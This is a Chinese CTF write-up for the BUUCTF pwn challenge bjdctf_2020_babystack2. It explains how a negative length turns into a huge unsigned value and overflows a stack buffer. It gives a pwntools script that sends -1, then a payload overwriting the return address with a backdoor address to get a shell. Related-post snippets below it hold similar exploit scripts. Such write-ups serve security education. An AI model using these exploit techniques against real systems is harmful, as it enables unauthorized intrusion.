BUUCTF-bjdctf_2020_babystack2-WP

原创已于 2022-10-18 00:09:25 修改 · 283 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#安全 #linux

于 2022-10-18 00:06:48 首次发布

BUUCTF 专栏收录该内容

34 篇文章

订阅专栏

本文探讨了一种栈溢出漏洞，通过分析read()函数的潜在溢出条件，发现当输入长度为-1时，由于类型转换会导致溢出。作者详细解释了如何利用这个漏洞，通过发送特定payload触发后门函数，并提供了利用脚本进行远程连接和互动。

0x1 checksec

只有NX保护

0x2 IDA

main

read()函数会存在溢出

跟进buf看偏移

只要nbytes>0x10即可溢出

但是前面if循环限制了nbytes的大小,所以这个方法不行

继续看,nbytes--------->unsigned int无符号整型

遇到-1会变成unsigned int的最大值，栈溢出

有后门函数

再进行交互,即可编写脚本

0x3 EXP

from pwn import *

r=remote("node4.buuoj.cn",26042)

backdoor_addr=0x400726

r.recvuntil('[+]Please input the length of your name:')
r.sendline('-1')

payload='a'*0x10+'b'*0x8
payload+=p64(backdoor_addr)
r.sendline(payload)

r.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

[BUUCTF]PWN——bjdctf_2020_babystack2

mcmuyanga的博客

11-03

790

bjdctf_2020_babystack2 附件步骤：例行检查，64位程序，开启了nx保护尝试运行一下程序，看看情况 64位ida载入，习惯性的先检索程序里的字符串，发现了bin/sh，双击跟进，找到了程序里的后门函数，backdoor=0x400726 从main函数开始看程序我们读入数据的大小由我们输入的参数nbytes控制，但是nbytes又不能大于10，这边注意到了nbytes参数的类型–>size_t 百度百科里对这个类型的解释是大概就是一个无符号整型，注意重点是无符

[buuctf]bjdctf_2020_babystack

逆向萌新的博客

06-19

1124

[buuctf]bjdctf_2020_babystack

参与评论您还未登录，请先登录后发表或查看评论

bjdctf_2020_babystack2【BUUCTF】

qq_41696518的博客

08-31

923

bjdctf_2020_babystack2【BUUCTF】

BUUCTF|PWN-bjdctf_2020_babystack2-WP

l2645470582_的博客

11-09

513

1.例行检查保护机制 2.我们用64位的IDA打开该文件 shift+f12查看关键字符串，我们看到关键字符串"/bin/sh" 然后我们找到后门函数的地址：backdoor_addr = 0x0400726 3.我们看看main函数里面的内容我们看到第一个nbytes是有符号数，第二个nbytes就变成了无符号数我们判断这是一个整数溢出所以 -1 = 4294967295 4.EXP #encoding = utf-8 fr...

BUUCTF bjdctf_2020_babystack2

2401_88087539的博客

01-30

297

pwn新手小白，写完题后整理的一点点思路，有借鉴其他wp，有任何问题各位师傅可以提出，接收批评指正

buuctf bjdctf_2020_babystack wp

Kata_Jhin的博客

01-29

247

buuctf bjdctf_2020_babystack wp

buuctf-pwn write-ups (1)

CoLin的pwn小屋

05-01

530

buuctf-pwn 001-016题wp

BUUCTF_WriteUp 2021-08-23

m0_56897090的博客

08-23

547

2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识：0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2：mprotectc

BUUCTF pwn wp 11 - 15

fa1c4的blog

08-17

537

ciscn_2019_n_8 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] var[13] = 0; var[14] = 0; init(); puts("What's your name?"); __isoc99_scanf("%s", var, v4, v5);

BUUCTF bjdctf_2020_babystack

小白垃圾笔记2

04-30

501

有的，所以我们的利用思路就是将返回地址先覆盖为pop rdi；ret 的地址，将参数(/bin/sh)传入rdi。然后再将system的地址填充进去，这样pop rdi；执行ret的时候就会去执行system。那么pop rdi;ret 后边的内容就应该是/bin/sh的地址了。有system函数调用，并且存在/bin/sh。去找有没有pop rdi ret。小白做题笔记而已，不建议阅读。64为程序用rdi传参。read函数存在栈溢出。

BUUCTF(pwn)bjdctf_2020_babystack

半岛铁盒的博客

03-29

503

from pwn import * p = remote("node3.buuoj.cn",27955) sys = 0x04006E6 p.sendlineafter("[+]Please input the length of your name:\n",'200') payload = 'a' * (0x10 + 0x8) + p64(sys) p.sendlineafter("[+]What's u name?\n",payload) p.interactive() 有疑问的欢迎留言∑ ...

bjdctf_2020_babystack【BUUCTF】

qq_41696518的博客

08-26

1126

bjdctf_2020_babystack

buuctf-bjdctf_2020_babystack（pwn）

2301_81574836的博客

02-18

970

buuctf-bjdctf_2020_babystack（pwn）题解

[BUUCTF-pwn]——bjdctf_2020_babystack

Y_peak的博客

02-10

450

[BUUCTF-pwn]——bjdctf_2020_babystack 题目地址:https://buuoj.cn/challenges#bjdctf_2020_babystack Linux中checksec一下 , 64位的我们要小心参数小于6位的函数. IDA中看看看到这里不用我多说了吧, So easy !!! exploit from pwn import * p = remote("node3.buuoj.cn",25355) sys = 0x04006EA p.sendlinea

BUUCTF(pwn)bjdctf_2020_babystack2

半岛铁盒的博客

04-04

263

这是一道整形溢出的题目 from pwn import * p = remote("node3.buuoj.cn",28786) flag=0x400726 p.sendlineafter("[+]Please input the length of your name:\n",'-1') p.recv() payload='a'*(0x10+8)+p64(flag) p.sendline(payload) p.interactive() 有疑问的欢迎留言 ...

BUUCTF PWN bjdctf_2020_babystack

Rt1Text的博客

04-23

431

1.checksec+运行 64位/NX保护 2.64位IDA进行中 1.main函数 read()函数溢出跟进buf,看看偏移 offset=0x10+8 但要注意一点: read(0, buf, (unsigned int)nbytes); 无符号整型,需要输入-1,进行整型溢出接下来就是常规的操作 backdoor函数地址 3.直接上脚本 from pwn import* #p=process('./12babystack') p=remote...

[BUUCTF]PWN——bjdctf_2020_babystack

BangSen1的博客

03-29

390

例行检查，64位，开启NX保护运行一下，用IDA打开，检索字符串，看到了后门跟进查看。找到了地址，shelladdr=0x4006EA 查看主函数接收函数长度由我们自己决定，由此可以造成溢出。 from pwn import* r=remote('node3.buuoj.cn',25232) shelladdr=0x4006EA r.sendline('100') payload='a'*(0x10+8)+p64(shelladdr) r.sendline(payload) r.

BUUCTF pwn——bjdctf_2020_babystack

CNS-Enterprise BCC-1701-J

03-31

434

BUUCTF 做题练习

错误信息表明缺少以下参数：-dp/--data_path, -wp/--weight_path, -lrg/--learning_rate_G, -lrd/--learning_rate_D, -pw/--weight_predictor, -dw/--weight_diversity